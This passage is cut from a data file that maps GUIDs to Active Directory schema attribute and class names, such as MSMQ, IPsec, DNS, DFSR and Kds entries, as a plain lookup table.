"9a0dc340-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-ID",
"bf967a2e-0de6-11d0-a285-00aa003049e2": "Search-Guide",
"67e4d912-f362-4052-8c79-42f45ba7b221": "ms-SPP-Phone-License",
"b40ff826-427a-11d1-a9c2-0000f80367c1": "Ipsec-Filter",
"5fe69b0b-e146-4f15-b0ab-c1e5d488e094": "simpleSecurityObject",
"553fd038-f32e-11d0-b0bc-00c04fd8dca6": "Admin-Context-Menu",
"b40ff823-427a-11d1-a9c2-0000f80367c1": "Ipsec-Filter-Reference",
"1d3c2d18-42d0-4868-99fe-0eca1e6fa9f3": "ms-DS-Has-Full-Replica-NCs",
"ffadb4b2-de39-11d1-90a5-00c04fd91ab1": "MSMQ-Site-Name",
"01072d9a-98ad-4a53-9744-e83e287278fb": "secretary",
"0353c4b5-d199-40b0-b3c5-deb32fd9ec06": "ms-SPP-Config-License",
"bf967918-0de6-11d0-a285-00aa003049e2": "Admin-Count",
"b40ff81d-427a-11d1-a9c2-0000f80367c1": "Ipsec-ID",
"15585999-fd49-4d66-b25d-eeb96aba8174": "ms-DS-Never-Reveal-Group",
"422144fa-c17f-4649-94d6-9731ed2784ed": "MSMQ-Site-Name-Ex",
"bf967a2f-0de6-11d0-a285-00aa003049e2": "Security-Identifier",
"1075b3a1-bbaf-49d2-ae8d-c4f25c823303": "ms-SPP-Issuance-License",
"b40ff828-427a-11d1-a9c2-0000f80367c1": "Ipsec-ISAKMP-Policy",
"bf967ab3-0de6-11d0-a285-00aa003049e2": "Site",
"bf967919-0de6-11d0-a285-00aa003049e2": "Admin-Description",
"b40ff820-427a-11d1-a9c2-0000f80367c1": "Ipsec-ISAKMP-Reference",
"303d9f4a-1dd6-4b38-8fc5-33afe8c988ad": "ms-DS-Reveal-OnDemand-Group",
"9a0dc32a-c100-11d1-bbc5-0080c76670c0": "MSMQ-Sites",
"bf967a31-0de6-11d0-a285-00aa003049e2": "See-Also",
"19d706eb-4d76-44a2-85d6-1c342be3be37": "ms-TPM-Srk-Pub-Thumbprint",
"bf96791a-0de6-11d0-a285-00aa003049e2": "Admin-Display-Name",
"b40ff81c-427a-11d1-a9c2-0000f80367c1": "Ipsec-Name",
"aa156612-2396-467e-ad6a-28d23fdb1865": "ms-DS-Secondary-KrbTgt-Number",
"9a0dc329-c100-11d1-bbc5-0080c76670c0": "MSMQ-Transactional",
"ddac0cf2-af8f-11d0-afeb-00c04fd930c9": "Seq-Notification",
"c894809d-b513-4ff8-8811-f4f43f5ac7bc": "ms-TPM-Owner-Information-Temp",
"b40ff827-427a-11d1-a9c2-0000f80367c1": "Ipsec-Negotiation-Policy",
"d50c2cde-8951-11d1-aebc-0000f80367c1": "Site-Link",
"18f9b67d-5ac6-4b3b-97db-d0a406afb7ba": "Admin-Multiselect-Property-Pages",
"07383075-91df-11d1-aebc-0000f80367c1": "IPSEC-Negotiation-Policy-Action",
"94f6f2ac-c76d-4b5e-b71f-f332c3e93c22": "ms-DS-Revealed-DSAs",
"c58aae32-56f9-11d2-90d0-00c04fd91ab1": "MSMQ-User-Sid",
"bf967a32-0de6-11d0-a285-00aa003049e2": "Serial-Number",
"ea1b7b93-5e48-46d5-bc6c-4df4fda78a35": "ms-TPM-Tpm-Information-For-Computer",
"52458038-ca6a-11d0-afff-0000f80367c1": "Admin-Property-Pages",
"b40ff822-427a-11d1-a9c2-0000f80367c1": "Ipsec-Negotiation-Policy-Reference",
"5dd68c41-bfdf-438b-9b5d-39d9618bf260": "ms-DS-KrbTgt-Link-BL",
"9a0dc336-c100-11d1-bbc5-0080c76670c0": "MSMQ-Version",
"09dcb7a0-165f-11d0-a064-00aa006c33ed": "Server-Name",
"14fa84c9-8ecd-4348-bc91-6d3ced472ab7": "ms-TPM-Tpm-Information-For-Computer-BL",
"b40ff829-427a-11d1-a9c2-0000f80367c1": "Ipsec-NFA",
"d50c2cdf-8951-11d1-aebc-0000f80367c1": "Site-Link-Bridge",
"9a7ad940-ca53-11d1-bbd0-0080c76670c0": "Allowed-Attributes",
"07383074-91df-11d1-aebc-0000f80367c1": "IPSEC-Negotiation-Policy-Type",
"c8bc72e0-a6b4-48f0-94a5-fd76a88c9987": "ms-DS-Is-Full-Replica-For",
"db0c9085-c1f2-11d1-bbc5-0080c76670c0": "msNPAllowDialin",
"26d9736d-6070-11d1-a9c6-0000f80367c1": "Server-Reference",
"0be0dd3b-041a-418c-ace9-2f17d23e9d42": "ms-DNS-Keymaster-Zones",
"9a7ad941-ca53-11d1-bbd0-0080c76670c0": "Allowed-Attributes-Effective",
"b40ff821-427a-11d1-a9c2-0000f80367c1": "Ipsec-NFA-Reference",
"ff155a2a-44e5-4de0-8318-13a58988de4f": "ms-DS-Is-Domain-For",
"db0c9089-c1f2-11d1-bbc5-0080c76670c0": "msNPCalledStationID",
"26d9736e-6070-11d1-a9c6-0000f80367c1": "Server-Reference-BL",
"aa12854c-d8fc-4d5e-91ca-368b8d829bee": "ms-DNS-Is-Signed",
"b7b13121-b82e-11d0-afee-0000f80367c1": "Ipsec-Policy",
"7a4117da-cd67-11d0-afff-0000f80367c1": "Sites-Container",
"9a7ad942-ca53-11d1-bbd0-0080c76670c0": "Allowed-Child-Classes",
"b40ff824-427a-11d1-a9c2-0000f80367c1": "Ipsec-Owners-Reference",
"37c94ff6-c6d4-498f-b2f9-c6f7f8647809": "ms-DS-Is-Partial-Replica-For",
"db0c908a-c1f2-11d1-bbc5-0080c76670c0": "msNPCallingStationID",
"bf967a33-0de6-11d0-a285-00aa003049e2": "Server-Role",
"c79f2199-6da1-46ff-923c-1f3f800c721e": "ms-DNS-Sign-With-NSEC3",
"9a7ad943-ca53-11d1-bbd0-0080c76670c0": "Allowed-Child-Classes-Effective",
"b7b13118-b82e-11d0-afee-0000f80367c1": "Ipsec-Policy-Reference",
"fe01245a-341f-4556-951f-48c033a89050": "ms-DS-Is-User-Cachable-At-Rodc",
"db0c908e-c1f2-11d1-bbc5-0080c76670c0": "msNPSavedCallingStationID",
"bf967a34-0de6-11d0-a285-00aa003049e2": "Server-State",
"7bea2088-8ce2-423c-b191-66ec506b1595": "ms-DNS-NSEC3-OptOut",
"bf967a9e-0de6-11d0-a285-00aa003049e2": "Leaf",
"bf967ab5-0de6-11d0-a285-00aa003049e2": "Storage",
"00fbf30c-91fe-11d1-aebc-0000f80367c1": "Alt-Security-Identities",
"00fbf30d-91fe-11d1-aebc-0000f80367c1": "Is-Critical-System-Object",
"cbdad11c-7fec-387b-6219-3a0627d9af81": "ms-DS-Revealed-List",
"db0c909c-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSCallbackNumber",
"b7b1311c-b82e-11d0-afee-0000f80367c1": "Service-Binding-Information",
"0dc063c1-52d9-4456-9e15-9c2434aafd94": "ms-DNS-Maintain-Trust-Anchor",
"45b01500-c419-11d1-bbc9-0080c76670c0": "ANR",
"28630ebe-41d5-11d1-a9c1-0000f80367c1": "Is-Defunct",
"aa1c88fd-b0f6-429f-b2ca-9d902266e808": "ms-DS-Revealed-List-BL",
"db0c90a4-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSFramedIPAddress",
"bf967a35-0de6-11d0-a285-00aa003049e2": "Service-Class-ID",
"5c5b7ad2-20fa-44bb-beb3-34b9c0f65579": "ms-DNS-DS-Record-Algorithms",
"1be8f17d-a9ff-11d0-afe2-00c04fd930c9": "Licensing-Site-Settings",
"b7b13124-b82e-11d0-afee-0000f80367c1": "Subnet",
"96a7dd65-9118-11d1-aebc-0000f80367c1": "App-Schema-Version",
"bf96798f-0de6-11d0-a285-00aa003049e2": "Is-Deleted",
"011929e6-8b5d-4258-b64a-00b0b4949747": "ms-DS-Last-Successful-Interactive-Logon-Time",
"db0c90a9-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSFramedRoute",
"bf967a36-0de6-11d0-a285-00aa003049e2": "Service-Class-Info",
"27d93c40-065a-43c0-bdd8-cdf2c7d120aa": "ms-DNS-RFC5011-Key-Rollovers",
"dd712226-10e4-11d0-a05f-00aa006c33ed": "Application-Name",
"f4c453f0-c5f1-11d1-bbcb-0080c76670c0": "Is-Ephemeral",
"c7e7dafa-10c3-4b8b-9acd-54f11063742e": "ms-DS-Last-Failed-Interactive-Logon-Time",
"db0c90b6-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSServiceType",
"b7b1311d-b82e-11d0-afee-0000f80367c1": "Service-Class-Name",
"ff9e5552-7db7-4138-8888-05ce320a0323": "ms-DNS-NSEC3-Hash-Algorithm",
"ddac0cf5-af8f-11d0-afeb-00c04fd930c9": "Link-Track-Object-Move-Table",
"b7b13125-b82e-11d0-afee-0000f80367c1": "Subnet-Container",
"8297931d-86d3-11d0-afda-00c04fd930c9": "Applies-To",
"bf967991-0de6-11d0-a285-00aa003049e2": "Is-Member-Of-DL",
"dc3ca86f-70ad-4960-8425-a4d6313d93dd": "ms-DS-Failed-Interactive-Logon-Count",
"db0c90c5-c1f2-11d1-bbc5-0080c76670c0": "msRASSavedCallbackNumber",
"28630eb8-41d5-11d1-a9c1-0000f80367c1": "Service-DNS-Name",
"13361665-916c-4de7-a59d-b1ebbd0de129": "ms-DNS-NSEC3-Random-Salt-Length",
"ba305f75-47e3-11d0-a1a6-00c04fd930c9": "Asset-Number",
"19405b9d-3cfa-11d1-a9c0-0000f80367c1": "Is-Member-Of-Partial-Attribute-Set",
"c5d234e5-644a-4403-a665-e26e0aef5e98": "ms-DS-Failed-Interactive-Logon-Count-At-Last-Successful-Logon",
"db0c90c6-c1f2-11d1-bbc5-0080c76670c0": "msRASSavedFramedIPAddress",
"28630eba-41d5-11d1-a9c1-0000f80367c1": "Service-DNS-Name-Type",
"80b70aab-8959-4ec0-8e93-126e76df3aca": "ms-DNS-NSEC3-Iterations",
"ddac0cf7-af8f-11d0-afeb-00c04fd930c9": "Link-Track-OMT-Entry",
"0296c11c-40da-11d1-a9c0-0000f80367c1": "Assistant",
"19405b9c-3cfa-11d1-a9c0-0000f80367c1": "Is-Privilege-Holder",
"31f7b8b6-c9f8-4f2d-a37b-58a823030331": "ms-DS-USN-Last-Sync-Success",
"db0c90c7-c1f2-11d1-bbc5-0080c76670c0": "msRASSavedFramedRoute",
"bf967a37-0de6-11d0-a285-00aa003049e2": "Service-Instance-Version",
"8f4e317f-28d7-442c-a6df-1f491f97b326": "ms-DNS-DNSKEY-Record-Set-TTL",
"bf967ab8-0de6-11d0-a285-00aa003049e2": "Trusted-Domain",
"398f63c0-ca60-11d1-bbd1-0000f81f10c0": "Assoc-NT-Account",
"8fb59256-55f1-444b-aacb-f5b482fe3459": "Is-Recycled",
"78fc5d84-c1dc-3148-8984-58f792d41d3e": "ms-DS-Value-Type-Reference",
"bf9679d3-0de6-11d0-a285-00aa003049e2": "Must-Contain",
"f3a64788-5306-11d1-a9c5-0000f80367c1": "Service-Principal-Name",
"29869b7c-64c4-42fe-97d5-fbc2fa124160": "ms-DNS-DS-Record-Set-TTL",
"ddac0cf6-af8f-11d0-afeb-00c04fd930c9": "Link-Track-Vol-Entry",
"3320fc38-c379-4c17-a510-1bdf6133c5da": "associatedDomain",
"bf967992-0de6-11d0-a285-00aa003049e2": "Is-Single-Valued",
"ab5543ad-23a1-3b45-b937-9b313d5474a8": "ms-DS-Value-Type-Reference-BL",
"80212840-4bdc-11d1-a9c4-0000f80367c1": "Name-Service-Flags",
"7d6c0e97-7e20-11d0-afd6-00c04fd930c9": "Setup-Command",
"03d4c32e-e217-4a61-9699-7bbc4729a026": "ms-DNS-Signature-Inception-Offset",
"281416e2-1968-11d0-a28f-00aa003049e2": "Type-Library",
"f7fbfc45-85ab-42a4-a435-780e62f7858b": "associatedName",
"bac80572-09c4-4fa9-9ae6-7628d7adbe0e": "jpegPhoto",
"8a0560c1-97b9-4811-9db7-dc061598965b": "ms-DS-Optional-Feature-Flags",
"bf9679d6-0de6-11d0-a285-00aa003049e2": "NC-Name",
"553fd039-f32e-11d0-b0bc-00c04fd8dca6": "Shell-Context-Menu",
"f6b0f0be-a8e4-4468-8fd9-c3c47b8722f9": "ms-DNS-Secure-Delegation-Polling-Period",
"ddac0cf4-af8f-11d0-afeb-00c04fd930c9": "Link-Track-Volume-Table",
"fa4693bb-7bc2-4cb9-81a8-c99c43b7905e": "attributeCertificateAttribute",
"bf967993-0de6-11d0-a285-00aa003049e2": "Keywords",
"bf9679d8-0de6-11d0-a285-00aa003049e2": "NETBIOS-Name",
"52458039-ca6a-11d0-afff-0000f80367c1": "Shell-Property-Pages",
"3443d8cd-e5b6-4f3b-b098-659a0214a079": "ms-DNS-Signing-Key-Descriptors",
"bf967abb-0de6-11d0-a285-00aa003049e2": "Volume",
"cb843f80-48d9-11d1-a9c3-0000f80367c1": "Attribute-Display-Names",
"1677581f-47f3-11d1-a9c3-0000f80367c1": "Knowledge-Information",
"07383076-91df-11d1-aebc-0000f80367c1": "netboot-Allow-New-Clients",
"45b01501-c419-11d1-bbc9-0080c76670c0": "Short-Server-Name",
"b7673e6d-cad9-4e9e-b31a-63e8098fdd63": "ms-DNS-Signing-Keys",
"bf967aa0-0de6-11d0-a285-00aa003049e2": "Locality",
"bf967922-0de6-11d0-a285-00aa003049e2": "Attribute-ID",
"c569bb46-c680-44bc-a273-e6c227d71b45": "labeledURI",
"0738307b-91df-11d1-aebc-0000f80367c1": "netboot-Answer-Only-Valid-Clients",
"3e74f60e-3e73-11d1-a9c0-0000f80367c1": "Show-In-Address-Book",
"28c458f5-602d-4ac9-a77c-b3f1be503a7e": "ms-DNS-DNSKEY-Records",
"ad44bb41-67d5-4d88-b575-7b20674e76d8": "PosixAccount",
"bf967924-0de6-11d0-a285-00aa003049e2": "Attribute-Security-GUID",
"1fbb0be8-ba63-11d0-afef-0000f80367c1": "Last-Backup-Restoration-Time",
"0738307a-91df-11d1-aebc-0000f80367c1": "netboot-Answer-Requests",
"bf967984-0de6-11d0-a285-00aa003049e2": "Show-In-Advanced-View-Only",
"285c6964-c11a-499e-96d8-bf7c75a223c6": "ms-DNS-Parent-Has-Secure-Delegation",
"52ab8671-5709-11d1-a9c6-0000f80367c1": "Lost-And-Found",
"bf967925-0de6-11d0-a285-00aa003049e2": "Attribute-Syntax",
"bf967995-0de6-11d0-a285-00aa003049e2": "Last-Content-Indexed",
"5643ff81-35b6-4ca9-9512-baf0bd0a2772": "ms-FRS-Hub-Member",
"07383079-91df-11d1-aebc-0000f80367c1": "netboot-Current-Client-Count",
"17eb4278-d167-11d0-b002-0000f80367c1": "SID-History",
"ba340d47-2181-4ca0-a2f6-fae4479dab2a": "ms-DNS-Propagation-Time",
"5b6d8467-1a18-4174-b350-9cc6e7b4ac8d": "ShadowAccount",
"9a7ad944-ca53-11d1-bbd0-0080c76670c0": "Attribute-Types",
"52ab8670-5709-11d1-a9c6-0000f80367c1": "Last-Known-Parent",
"92aa27e0-5c50-402d-9ec1-ee847def9788": "ms-FRS-Topology-Pref",
"3e978921-8c01-11d0-afda-00c04fd930c9": "Netboot-GUID",
"2a39c5b2-8960-11d1-aebc-0000f80367c1": "Signature-Algorithms",
"aff16770-9622-4fbc-a128-3088777605b9": "ms-DNS-NSEC3-User-Salt",
"11b6cc94-48c4-11d1-a9c3-0000f80367c1": "Meeting",
"d0e1d224-e1a0-42ce-a2da-793ba5244f35": "audio",
"bf967996-0de6-11d0-a285-00aa003049e2": "Last-Logoff",
"1a861408-38c3-49ea-ba75-85481a77c655": "ms-DFSR-Version",
"532570bd-3d77-424f-822f-0d636dc6daad": "Netboot-DUID",
"3e978924-8c01-11d0-afda-00c04fd930c9": "Site-GUID",
"387d9432-a6d1-4474-82cd-0a89aae084ae": "ms-DNS-NSEC3-Current-Salt",
"2a9350b8-062c-4ed0-9903-dde10d06deba": "PosixGroup",
"6da8a4fe-0e52-11d0-a286-00aa003049e2": "Auditing-Policy",
"bf967997-0de6-11d0-a285-00aa003049e2": "Last-Logon",
"78f011ec-a766-4b19-adcf-7b81ed781a4d": "ms-DFSR-Extension",
"3e978920-8c01-11d0-afda-00c04fd930c9": "Netboot-Initialization",
"d50c2cdd-8951-11d1-aebc-0000f80367c1": "Site-Link-List",
"07831919-8f94-4fb6-8a42-91545dccdad3": "ms-Authz-Effective-Security-Policy",
"c9010e74-4e58-49f7-8a89-5e3e2340fcf8": "ms-COM-Partition",
"bf967928-0de6-11d0-a285-00aa003049e2": "Authentication-Options",
"c0e20a04-0e5a-4ff3-9482-5efeaecd7060": "Last-Logon-Timestamp",
"d7d5e8c1-e61f-464f-9fcf-20bbe0a2ec54": "ms-DFSR-RootPath",
"0738307e-91df-11d1-aebc-0000f80367c1": "netboot-IntelliMirror-OSes",
"d50c2cdc-8951-11d1-aebc-0000f80367c1": "Site-List",
"b946bece-09b5-4b6a-b25a-4b63a330e80e": "ms-Authz-Proposed-Security-Policy",
"2517fadf-fa97-48ad-9de6-79ac5721f864": "IpService",
"1677578d-47f3-11d1-a9c3-0000f80367c1": "Authority-Revocation-List",
"bf967998-0de6-11d0-a285-00aa003049e2": "Last-Set-Time",
"90b769ac-4413-43cf-ad7a-867142e740a3": "ms-DFSR-RootSizeInMb",
"07383077-91df-11d1-aebc-0000f80367c1": "netboot-Limit-Clients",
"3e10944c-c354-11d0-aff8-0000f80367c1": "Site-Object",
"8e1685c6-3e2f-48a2-a58d-5af0ea789fa0": "ms-Authz-Last-Effective-Security-Policy",
"250464ab-c417-497a-975a-9e0d459a7ca1": "ms-COM-PartitionSet",
"bf96792c-0de6-11d0-a285-00aa003049e2": "Auxiliary-Class",
"7d6c0e9c-7e20-11d0-afd6-00c04fd930c9": "Last-Update-Sequence",
"86b9a69e-f0a6-405d-99bb-77d977992c2a": "ms-DFSR-StagingPath",
"07383080-91df-11d1-aebc-0000f80367c1": "netboot-Locally-Installed-OSes",
"3e10944d-c354-11d0-aff8-0000f80367c1": "Site-Object-BL",
"80997877-f874-4c68-864d-6e508a83bdbd": "ms-Authz-Resource-Condition",
"9c2dcbd2-fbf0-4dc7-ace0-8356dcd0f013": "IpProtocol",
"bf96792d-0de6-11d0-a285-00aa003049e2": "Bad-Password-Time",
"7359a352-90f7-11d1-aebc-0000f80367c1": "LDAP-Admin-Limits",
"250a8f20-f6fc-4559-ae65-e4b24c67aebe": "ms-DFSR-StagingSizeInMb",
"3e978923-8c01-11d0-afda-00c04fd930c9": "Netboot-Machine-File-Path",
"1be8f17c-a9ff-11d0-afe2-00c04fd930c9": "Site-Server",
"62f29b60-be74-4630-9456-2f6691993a86": "ms-Authz-Central-Access-Policy-ID",
"90df3c3e-1854-4455-a5d7-cad40d56657a": "ms-DS-App-Configuration",
"bf96792e-0de6-11d0-a285-00aa003049e2": "Bad-Pwd-Count",
"bf96799a-0de6-11d0-a285-00aa003049e2": "LDAP-Display-Name",
"5cf0bcc8-60f7-4bff-bda6-aea0344eb151": "ms-DFSR-ConflictPath",
"07383078-91df-11d1-aebc-0000f80367c1": "netboot-Max-Clients",
"26d9736f-6070-11d1-a9c6-0000f80367c1": "SMTP-Mail-Address",
"57f22f7a-377e-42c3-9872-cec6f21d2e3e": "ms-Authz-Member-Rules-In-Central-Access-Policy",
"cadd1e5e-fefc-4f3f-b5a9-70e994204303": "OncRpc",
"1f0075f9-7e40-11d0-afd6-00c04fd930c9": "Birth-Location",
"7359a353-90f7-11d1-aebc-0000f80367c1": "LDAP-IPDeny-List",
"9ad33fc9-aacf-4299-bb3e-d1fc6ea88e49": "ms-DFSR-ConflictSizeInMb",
"2df90d85-009f-11d2-aa4c-00c04fd7d83a": "Netboot-Mirror-Data-File",
"2ab0e76c-7041-11d2-9905-0000f87a57d4": "SPN-Mappings",
"516e67cf-fedd-4494-bb3a-bc506a948891": "ms-Authz-Member-Rules-In-Central-Access-Policy-BL",
"9e67d761-e327-4d55-bc95-682f875e2f8e": "ms-DS-App-Data",
"d50c2cdb-8951-11d1-aebc-0000f80367c1": "Bridgehead-Server-List-BL",
"03726ae7-8e7d-4446-8aae-a91657c00993": "ms-DFSR-Enabled",
"0738307c-91df-11d1-aebc-0000f80367c1": "netboot-New-Machine-Naming-Policy",
"bf967a39-0de6-11d0-a285-00aa003049e2": "State-Or-Province-Name",
"fa32f2a6-f28b-47d0-bf91-663e8f910a72": "ms-DS-Claim-Source",
"ab911646-8827-4f95-8780-5a8f008eb68f": "IpHost",
"d50c2cda-8951-11d1-aebc-0000f80367c1": "Bridgehead-Transport-List",
"bf96799b-0de6-11d0-a285-00aa003049e2": "Link-ID",
"eeed0fc8-1001-45ed-80cc-bbf744930720": "ms-DFSR-ReplicationGroupType",
"0738307d-91df-11d1-aebc-0000f80367c1": "netboot-New-Machine-OU",
"bf967a3a-0de6-11d0-a285-00aa003049e2": "Street-Address",
"92f19c05-8dfa-4222-bbd1-2c4f01487754": "ms-DS-Claim-Source-Type",
"cfee1051-5f28-4bae-a863-5d0cc18a8ed1": "ms-DS-Az-Admin-Manager",
"f87fa54b-b2c5-4fd7-88c0-daccb21d93c5": "buildingName",
"2ae80fe2-47b4-11d0-a1a4-00c04fd930c9": "Link-Track-Secret",
"23e35d4c-e324-4861-a22f-e199140dae00": "ms-DFSR-TombstoneExpiryInMin",
"07383082-91df-11d1-aebc-0000f80367c1": "netboot-SCP-BL",
"3860949f-f6a8-4b38-9950-81ecb6bc2982": "Structural-Object-Class",
"0c2ce4c7-f1c3-4482-8578-c60d4bb74422": "ms-DS-Claim-Is-Value-Space-Restricted",
"d95836c3-143e-43fb-992a-b057f1ecadf9": "IpNetwork",
"bf96792f-0de6-11d0-a285-00aa003049e2": "Builtin-Creation-Time",
"bf96799d-0de6-11d0-a285-00aa003049e2": "Lm-Pwd-History",
"d68270ac-a5dc-4841-a6ac-cd68be38c181": "ms-DFSR-FileFilter",
"07383081-91df-11d1-aebc-0000f80367c1": "netboot-Server",
"bf967a3b-0de6-11d0-a285-00aa003049e2": "Sub-Class-Of",
"cd789fb9-96b4-4648-8219-ca378161af38": "ms-DS-Claim-Is-Single-Valued",
"ddf8de9b-cba5-4e12-842e-28d8b66f75ec": "ms-DS-Az-Application",
"bf967930-0de6-11d0-a285-00aa003049e2": "Builtin-Modified-Count",
"bf96799e-0de6-11d0-a285-00aa003049e2": "Local-Policy-Flags",
"93c7b477-1f2e-4b40-b7bf-007e8d038ccf": "ms-DFSR-DirectoryFilter",
"2df90d84-009f-11d2-aa4c-00c04fd7d83a": "Netboot-SIF-File",
"bf967a3c-0de6-11d0-a285-00aa003049e2": "Sub-Refs",
"1e5d393d-8cb7-4b4f-840a-973b36cc09c3": "ms-DS-Generation-Id",
"72efbf84-6e7b-4a5c-a8db-8a75a7cad254": "NisNetgroup",
"bf967931-0de6-11d0-a285-00aa003049e2": "Business-Category",
"80a67e4d-9f22-11d0-afdd-00c04fd930c9": "Local-Policy-Reference",
"4699f15f-a71f-48e2-9ff5-5897c0759205": "ms-DFSR-Schedule",
"0738307f-91df-11d1-aebc-0000f80367c1": "netboot-Tools",
"9a7ad94d-ca53-11d1-bbd0-0080c76670c0": "SubSchemaSubEntry",
"a13df4e2-dbb0-4ceb-828b-8b2e143e9e81": "ms-DS-Primary-Computer",
"860abe37-9a9b-4fa4-b3d2-b8ace5df9ec5": "ms-DS-Az-Operation",
"ba305f76-47e3-11d0-a1a6-00c04fd930c9": "Bytes-Per-Minute",
"bf9679a1-0de6-11d0-a285-00aa003049e2": "Locale-ID",
"048b4692-6227-4b67-a074-c4437083e14b": "ms-DFSR-Keywords",
"bf9679d9-0de6-11d0-a285-00aa003049e2": "Network-Address",
"963d274c-48be-11d1-a9c3-0000f80367c1": "Super-Scope-Description",
"998c06ac-3f87-444e-a5df-11b03dc8a50c": "ms-DS-Is-Primary-Computer-For",
"7672666c-02c1-4f33-9ecf-f649c1dd9b7c": "NisMap",
"bf967932-0de6-11d0-a285-00aa003049e2": "CA-Certificate",
"bf9679a2-0de6-11d0-a285-00aa003049e2": "Locality-Name",
"fe515695-3f61-45c8-9bfa-19c148c57b09": "ms-DFSR-Flags",
"bf9679da-0de6-11d0-a285-00aa003049e2": "Next-Level-Store",
"963d274b-48be-11d1-a9c3-0000f80367c1": "Super-Scopes",
"db2c48b2-d14d-ec4e-9f58-ad579d8b440e": "ms-Kds-KDF-AlgorithmID",
"8213eac9-9d55-44dc-925c-e9a52b927644": "ms-DS-Az-Role",
"963d2740-48be-11d1-a9c3-0000f80367c1": "CA-Certificate-DN",
"d9e18316-8939-11d1-aebc-0000f80367c1": "Localized-Description",
"d6d67084-c720-417d-8647-b696237a114c": "ms-DFSR-Options",
"bf9679db-0de6-11d0-a285-00aa003049e2": "Next-Rid",
"5245801d-ca6a-11d0-afff-0000f80367c1": "Superior-DNS-Root",
"8a800772-f4b8-154f-b41c-2e4271eff7a7": "ms-Kds-KDF-Param",
"904f8a93-4954-4c5f-b1e1-53c097a31e13": "NisObject",
"963d2735-48be-11d1-a9c3-0000f80367c1": "CA-Connect",
"a746f0d1-78d0-11d2-9916-0000f87a57d4": "Localization-Display-Id",
"1035a8e1-67a8-4c21-b7bb-031cdf99d7a0": "ms-DFSR-ContentSetGuid",
"52458018-ca6a-11d0-afff-0000f80367c1": "Non-Security-Member",
"bf967a3f-0de6-11d0-a285-00aa003049e2": "Supplemental-Credentials",
"1702975d-225e-cb4a-b15d-0daea8b5e990": "ms-Kds-SecretAgreement-AlgorithmID",
"4feae054-ce55-47bb-860e-5b12063a51de": "ms-DS-Az-Scope",
"963d2738-48be-11d1-a9c3-0000f80367c1": "CA-Usages",
"09dcb79f-165f-11d0-a064-00aa006c33ed": "Location",
"e3b44e05-f4a7-4078-a730-f48670a743f8": "ms-DFSR-RdcEnabled",
"52458019-ca6a-11d0-afff-0000f80367c1": "Non-Security-Member-BL",
"1677588f-47f3-11d1-a9c3-0000f80367c1": "Supported-Application-Context",
"30b099d9-edfe-7549-b807-eba444da79e9": "ms-Kds-SecretAgreement-Param",
"a699e529-a637-4b7d-a0fb-5dc466a0b8a7": "IEEE802Device",
"963d2736-48be-11d1-a9c3-0000f80367c1": "CA-WEB-URL",
"bf9679a4-0de6-11d0-a285-00aa003049e2": "Lock-Out-Observation-Window",
"f402a330-ace5-4dc1-8cc9-74d900bf8ae0": "ms-DFSR-RdcMinFileSizeInKb",
"19195a56-6da0-11d0-afd3-00c04fd930c9": "Notification-List",
"bf967a41-0de6-11d0-a285-00aa003049e2": "Surname",
"e338f470-39cd-4549-ab5b-f69f9e583fe0": "ms-Kds-PublicKey-Length",
"1ed3a473-9b1b-418a-bfa0-3a37b95a5306": "ms-DS-Az-Task",
"d9e18314-8939-11d1-aebc-0000f80367c1": "Can-Upgrade-Script",
"bf9679a5-0de6-11d0-a285-00aa003049e2": "Lockout-Duration",
"2cc903e2-398c-443b-ac86-ff6b01eac7ba": "ms-DFSR-DfsPath",
"bf9679df-0de6-11d0-a285-00aa003049e2": "NT-Group-Members",
"037651e4-441d-11d1-a9c3-0000f80367c1": "Sync-Attributes",
"615f42a1-37e7-1148-a0dd-3007e09cfc81": "ms-Kds-PrivateKey-Length",
"4bcb2477-4bb3-4545-a9fc-fb66e136b435": "BootableDevice",
"9a7ad945-ca53-11d1-bbd0-0080c76670c0": "Canonical-Name",
"bf9679a6-0de6-11d0-a285-00aa003049e2": "Lockout-Threshold",
"51928e94-2cd8-4abe-b552-e50412444370": "ms-DFSR-RootFence",
"3e97891f-8c01-11d0-afda-00c04fd930c9": "NT-Mixed-Domain",
"037651e3-441d-11d1-a9c3-0000f80367c1": "Sync-Membership",
"26627c27-08a2-0a40-a1b1-8dce85b42993": "ms-Kds-RootKeyData",
"44f00041-35af-468b-b20a-6ce8737c580b": "ms-DS-Optional-Feature",
"d4159c92-957d-4a87-8a67-8d2934e01649": "carLicense",
"28630ebf-41d5-11d1-a9c1-0000f80367c1": "Lockout-Time",
"2dad8796-7619-4ff8-966e-0a5cc67b287f": "ms-DFSR-ReplicationGroupGuid",
"bf9679e2-0de6-11d0-a285-00aa003049e2": "Nt-Pwd-History",
"037651e2-441d-11d1-a9c3-0000f80367c1": "Sync-With-Object",
"d5f07340-e6b0-1e4a-97be-0d3318bd9db1": "ms-Kds-Version",
"d6710785-86ff-44b7-85b5-f1f8689522ce": "msSFU-30-Mail-Aliases",
"7bfdcb81-4807-11d1-a9c3-0000f80367c1": "Catalogs",
"bf9679a9-0de6-11d0-a285-00aa003049e2": "Logo",
"f7b85ba9-3bf9-428f-aab4-2eee6d56f063": "ms-DFSR-DfsLinkTarget",
"bf9679e3-0de6-11d0-a285-00aa003049e2": "NT-Security-Descriptor",
"037651e5-441d-11d1-a9c3-0000f80367c1": "Sync-With-SID",
"96400482-cf07-e94c-90e8-f2efc4f0495e": "ms-Kds-DomainID",
"3bcd9db8-f84b-451c-952f-6c52b81f9ec6": "ms-DS-Password-Settings",
"7bfdcb7e-4807-11d1-a9c3-0000f80367c1": "Categories",
"bf9679aa-0de6-11d0-a285-00aa003049e2": "Logon-Count",
"261337aa-f1c3-44b2-bbea-c88d49e6f0c7": "ms-DFSR-MemberReference",
"bf9679e4-0de6-11d0-a285-00aa003049e2": "Obj-Dist-Name",
"bf967a43-0de6-11d0-a285-00aa003049e2": "System-Auxiliary-Class",
"6cdc047f-f522-b74a-9a9c-d95ac8cdfda2": "ms-Kds-UseStartTime",
"e263192c-2a02-48df-9792-94f2328781a0": "msSFU-30-Net-Id",
"7d6c0e94-7e20-11d0-afd6-00c04fd930c9": "Category-Id",
"bf9679ab-0de6-11d0-a285-00aa003049e2": "Logon-Hours",
"6c7b5785-3d21-41bf-8a8a-627941544d5a": "ms-DFSR-ComputerReference",
"26d97369-6070-11d1-a9c6-0000f80367c1": "Object-Category",
"e0fa1e62-9b45-11d0-afdd-00c04fd930c9": "System-Flags",
